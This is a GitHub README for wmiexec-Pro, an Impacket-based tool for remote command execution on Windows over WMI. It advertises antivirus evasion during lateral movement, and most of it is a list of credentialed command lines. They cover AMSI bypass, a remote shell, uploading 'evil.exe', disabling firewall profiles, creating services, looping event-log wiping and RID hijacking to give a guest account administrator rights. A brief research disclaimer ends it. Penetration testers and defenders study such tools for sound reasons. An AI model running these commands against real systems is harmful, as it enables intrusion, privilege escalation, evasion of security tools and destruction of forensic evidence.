

<a name="readme-top"></a>


New generation of wmiexec.py.

Table of Contents

<ol> <li> <a href="#info">Info</a> </li> <li> <a href="#special-thanks">Special thanks</a> </li> <li> <a href="#features">Features</a> </li> <li> <a href="#getting-started">Getting Started</a> <ul> <li><a href="#installation">Installation</a></li> </ul> </li> <li><a href="#usage">Usage</a></li> <li><a href="#screenshots">Screenshots</a></li> <li><a href="#how-it-works">How it works?</a></li> <li><a href="#disclaimer">Disclaimer</a></li> <li><a href="#references">References</a></li> </ol>


The new generation of wmiexec.py, more new features, whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement (Windows Defender, HuoRong, 360)

<p align="right">(<a href="#readme-top">back to top</a>)</p>

Special thanks

<p align="right">(<a href="#readme-top">back to top</a>)</p>


<p align="right">(<a href="#readme-top">back to top</a>)</p>

Getting Started


Only need latest version of Impacket

  1. Clone the impacket repository
    git clone https://github.com/fortra/impacket
  2. Install imapcket
    cd imapcket && sudo pip3 install .
  3. Enjoy it :)
    git clone https://github.com/XiaoliChan/wmiexec-Pro
<p align="right">(<a href="#readme-top">back to top</a>)</p>


python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Basic enumeration:
   python3 wmiexec-pro.py administrator:password@ enum -run

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:password@ amsi -enable
   python3 wmiexec-pro.py administrator:password@ amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:password@ exec-command -shell (Launch a semi-interactive shell)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" (Default is with output mode)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" -silent (Silent mode)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" -silent -old (Slient mode in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" -old (With output in old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" -save (With output and save output to file)
   python3 wmiexec-pro.py administrator:password@ exec-command -command "whoami" -old -save
   python3 wmiexec-pro.py administrator:password@ exec-command -clear (Remove temporary class for command result storage)
   python3 wmiexec-pro.py administrator:password@ filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:password@ filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (Download file over 512KB)
   python3 wmiexec-pro.py administrator:password@ filetransfer -clear (Remove temporary class for file transfer)
   python3 wmiexec-pro.py administrator:password@ rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:password@ rdp -enable -old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ rdp -enable-ram (Enable Restricted Admin Mode for PTH, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ rdp -disable
   python3 wmiexec-pro.py administrator:password@ rdp -disable -old (For old version OS, such as server 2003, not support old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ rdp -disable-ram (Disable Restricted Admin Mode)

WinRM (Only support win7+):
   python3 wmiexec-pro.py administrator:password@ winrm -enable
   python3 wmiexec-pro.py administrator:password@ winrm -disable

Firewall (Only support win8+):
   python3 wmiexec-pro.py administrator:password@ firewall -search-port 445
   python3 wmiexec-pro.py administrator:password@ firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:password@ firewall -rule-id (ID from search port) -action [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:password@ firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:password@ firewall -firewall-profile disable (Disable all firewall profiles)
   python3 wmiexec-pro.py administrator:password@ service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe'
   python3 wmiexec-pro.py administrator:password@ service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\calc.exe' -class "Win32_TerminalService" (Create service via alternative class)
   python3 wmiexec-pro.py administrator:password@ service -action start -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action stop -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action disable -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action auto-start -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action manual-start -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action getinfo -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -action delete -service-name "test"
   python3 wmiexec-pro.py administrator:password@ service -dump all-services.json

   python3 wmiexec-pro.py administrator:password@ eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:password@ eventlog -retrive object-ID (Stop looping cleaning eventlog)

RID Hijack:
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 501 -action grant (Grant access permissions for SAM/SAM subkey in registry)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 501 -action grant-old (For old version OS, such as server 2003)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 501 -action activate (Activate user)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 501 -action deactivate (Deactivate user)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 501 -action hijack -user 501 -hijack-rid 500 (Hijack guest user rid 501 to administrator rid 500)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -blank-pass-login enable (Enable blank password login)
   python3 wmiexec-pro.py administrator:password@ rid-hijack -blank-pass-login disable
   python3 wmiexec-pro.py administrator:password@ rid-hijack -user 500 -action backup (This will save user profile data as json file)
   python3 wmiexec-pro.py guest@ -no-pass rid-hijack -user 500 -remove (Use guest user remove administrator user profile after rid hijacked)
   python3 wmiexec-pro.py guest@ -no-pass rid-hijack -restore "backup.json" (Restore user profile for target user)
<p align="right">(<a href="#readme-top">back to top</a>)</p>


<p align="right">(<a href="#readme-top">back to top</a>)</p>

How it works?

<p align="right">(<a href="#readme-top">back to top</a>)</p>


The spirit of this Open Source initiative is to help security researchers, and the community, speed up research and educational activities related to the implementation of networking protocols and stacks.

The information in this repository is for research and educational purposes and not meant to be used in production environments and/or as part of commercial products.

If you desire to use this code or some part of it for your own uses, we recommend applying proper security development life cycle and secure coding practices, as well as generate and track the respective indicators of compromise according to your needs.

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